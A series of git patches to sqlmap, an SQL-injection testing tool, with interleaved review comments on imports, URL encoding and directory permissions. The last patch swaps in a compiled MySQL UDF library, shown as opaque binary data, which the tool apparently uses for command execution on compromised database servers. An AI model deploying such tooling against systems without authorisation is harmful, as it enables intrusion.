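Review bot: The rewritten `Popen` call in `update()` uses `sys.getfilesystemencoding()`, but this hunk adds only `from lib.core.settings import UNICODE_ENCODING`, and the module's import block (visible in the next commit's hunk on this page) lists `locale`, `os`, `re`, `subprocess` and `time` with no `sys`, so the call would raise `NameError` the first time `--update` runs, and the now-unused `locale` import is left behind. The next commit on this page (`Fixes #2959`) adds `import sys` and drops `locale`, which confirms the gap; the import should have landed in this commit. Separately, the command still runs via `shell=True` with a formatted string; `GIT_REPOSITORY` appears to be a settings constant rather than user input, and a comment saying so next to the call, e.g. `# GIT_REPOSITORY is a fixed constant, never user input, so shell=True is acceptable here`, would record why that is safe. `update()` starts and ends outside the hunk.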
@@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8f9ed47a90b8d4b1c11b7e94b3d2e75b lib/core/settings.py +a78fff3d9089addb212c284c87baaad4 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -1c2e5a9a34d4778c336a3d66d86ad000 lib/core/update.py +755dc074f42ca8c73d1f2549a1cf09d1 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 8d6cc4ae2cb57a195e5fa6bc36fd0d3b8d25519a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 3 Mar 2018 00:50:47 +0100 Subject: [PATCH 048/428] Fixes #2959 --- lib/core/settings.py | 2 +- lib/core/update.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cd02c1e8067..b55a209980a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.2" +VERSION = "1.2.3.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 2da80dfd60d..a411594002e 100644 --- a/lib/core/update.py +++ b/lib/core/update.py 
@@ -5,10 +5,10 @@ See the file 'LICENSE' for copying permission """ -import locale import os import re import subprocess +import sys import time from lib.core.common import dataToStdout diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 19311787a1c..dad4c152a5d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a78fff3d9089addb212c284c87baaad4 lib/core/settings.py +2826b47bfd9c3157039f7de0dba235ab lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -755dc074f42ca8c73d1f2549a1cf09d1 lib/core/update.py +063c10fb8261994fe1f8c8ace715aa76 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 76905e8728a03b1fabd0514fd15a3ca9108e8fc2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 5 Mar 2018 10:53:24 +0100 Subject: [PATCH 049/428] Patch related to the #2953 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 ++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b55a209980a..803276e9f61 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.3" +VERSION = "1.2.3.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index c8c4109fe68..19049bf31a7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -861,7 +861,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent skip = True if not skip: - payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below + spaceplus = kb.postSpaceToPlus and place in (PLACE.POST, PLACE.CUSTOM_POST) + value = urlencode(value, spaceplus=spaceplus) + payload = urlencode(payload, safe='%', spaceplus=spaceplus) value = agent.replacePayload(value, payload) postUrlEncode = False @@ -1038,7 +1040,7 @@ def _randomizeParameter(paramString, randomParameter): name = safeVariableNaming(name) elif name in keywords: name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus)) + value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) variables[name] = value if cookie: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index dad4c152a5d..f0ce097f4b2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
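Review bot: The new line `value = urlencode(value, spaceplus=spaceplus)` in `queryPage` encodes the whole parameter string before `agent.replacePayload(value, payload)`, whereas before only `payload` was encoded; unless `urlencode`'s default `safe` leaves `%` untouched (the `payload` call passes `safe='%'` explicitly, the `value` call does not), any already-encoded `%XX` sequence in the original request value is encoded a second time. If the value is known to be decoded at this point, a one-line comment stating so would help; otherwise `value = urlencode(value, safe='%', spaceplus=spaceplus)` looks like the safer default. The second hunk only renames the `plusspace` keyword to `spaceplus`, and `queryPage` starts and ends outside the hunks.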
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-2826b47bfd9c3157039f7de0dba235ab lib/core/settings.py
+9fde692b6fa94718d5fbe8f804e4edde lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
@@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py
 eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-cbe4c7513501e8edbed9d5d3af9bdc1d lib/request/connect.py
+6b70d287ed2508ffc66b37994d5ffca5 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py
From f95d0c831baab99add92ac8dcdb729da8b92ee5f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 7 Mar 2018 14:34:38 +0100
Subject: [PATCH 050/428] Minor refactoring (already default mode in os.makedirs)
---
 lib/core/dump.py | 6 +++---
 lib/core/settings.py | 2 +-
 lib/core/target.py | 8 ++++----
 txt/checksum.md5 | 6 +++---
 4 files changed, 11 insertions(+), 11 deletions(-)
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 33f68e63d91..b3e876c42aa 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -415,7 +415,7 @@ def dbTableValues(self, tableValues):
 elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
 if not os.path.isdir(dumpDbPath):
 try:
- os.makedirs(dumpDbPath, 0755)
+ os.makedirs(dumpDbPath)
 except:
 warnFile = True
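Review bot: Dropping the explicit `0755` from `os.makedirs(dumpDbPath)` does not preserve the mode: `os.makedirs` defaults to 0777 masked by the process umask, so the dump directory, which receives extracted table data, becomes group- or world-writable under a permissive umask (002 or 000) where it was previously 0755 regardless of umask. The same applies to the hunks at @@ -424 and @@ -612 in lib/core/dump.py and at @@ -581, @@ -603, @@ -624 and @@ -654 in lib/core/target.py. If honouring the umask is the intent, a comment such as `# mode deliberately left to the umask` makes that explicit; otherwise keep `os.makedirs(dumpDbPath, 0755)`. dbTableValues starts and ends outside the hunk.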
@@ -424,7 +424,7 @@ def dbTableValues(self, tableValues):
 if not os.path.isdir(dumpDbPath):
 try:
- os.makedirs(dumpDbPath, 0755)
+ os.makedirs(dumpDbPath)
 except Exception, ex:
 try:
 tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
@@ -612,7 +612,7 @@ def dbTableValues(self, tableValues):
 mimetype = magic.from_buffer(value, mime=True)
 if any(mimetype.startswith(_) for _ in ("application", "image")):
 if not os.path.isdir(dumpDbPath):
- os.makedirs(dumpDbPath, 0755)
+ os.makedirs(dumpDbPath)
 _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
 filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 803276e9f61..460c39fdf09 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.4"
+VERSION = "1.2.3.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/core/target.py b/lib/core/target.py
index 146f3de4737..d5ec2ccf92c 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -581,7 +581,7 @@ def _createFilesDir():
 if not os.path.isdir(conf.filePath):
 try:
- os.makedirs(conf.filePath, 0755)
+ os.makedirs(conf.filePath)
 except OSError, ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
 warnMsg = "unable to create files directory "
@@ -603,7 +603,7 @@ def _createDumpDir():
 if not os.path.isdir(conf.dumpPath):
 try:
- os.makedirs(conf.dumpPath, 0755)
+ os.makedirs(conf.dumpPath)
 except OSError, ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
 warnMsg = "unable to create dump directory "
@@ -624,7 +624,7 @@ def _createTargetDirs():
 try:
 if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
- os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
+ os.makedirs(paths.SQLMAP_OUTPUT_PATH)
 _ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
 open(_, "w+b").close()
@@ -654,7 +654,7 @@ def _createTargetDirs():
 try:
 if not os.path.isdir(conf.outputPath):
- os.makedirs(conf.outputPath, 0755)
+ os.makedirs(conf.outputPath)
 except (OSError, IOError, TypeError), ex:
 try:
 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index f0ce097f4b2..a0df032453d 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -34,7 +34,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py
 12e80071013606f01822c3823fb51054 lib/core/decorators.py
 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py
 a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py
-0d742fbf72bca25a3e82640616c30c9a lib/core/dump.py
+9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py
 c8551f7696a76450e6d139409e4f06cd lib/core/enums.py
 cada93357a7321655927fc9625b3bfec lib/core/exception.py
 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
@@ -46,10 +46,10 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-9fde692b6fa94718d5fbe8f804e4edde lib/core/settings.py
+4bb1c9ea37c92266776add390287cb39 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
-505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
+3cc852f927833895361973fbcfd156d2 lib/core/target.py
 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py
 de9922a29c71a235cb95a916ff925db2 lib/core/threads.py
 c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
From 4f2f31af674070d3764fe11046803df1bc33ef96 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 7 Mar 2018 15:43:42 +0100
Subject: [PATCH 051/428] Compiled 32-bit version for #2965
---
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 udf/mysql/windows/32/lib_mysqludf_sys.dll_ | Bin 4309 -> 4477 bytes
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 460c39fdf09..f273f963504 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.3.5"
+VERSION = "1.2.3.6"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index a0df032453d..d5e7df371a3 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-4bb1c9ea37c92266776add390287cb39 lib/core/settings.py
+bcc364e787f34f4c3e65eb464ab6f8d6 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 3cc852f927833895361973fbcfd156d2 lib/core/target.py
@@ -364,7 +364,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py
 593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py
 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_
 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
-7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
+ada861971f716ee1307b30e7de711b29 udf/mysql/windows/32/lib_mysqludf_sys.dll_
 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
 c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_ index ae438d63619bd09e27b0a68f7858db75f4017a23..9ad5063483a67ff509d63dd7ed18cd7f78e55596 100644 GIT binary patch literal 4477 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 Pzx$g0m$(0Z=M1pG<72!& literal 4309 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 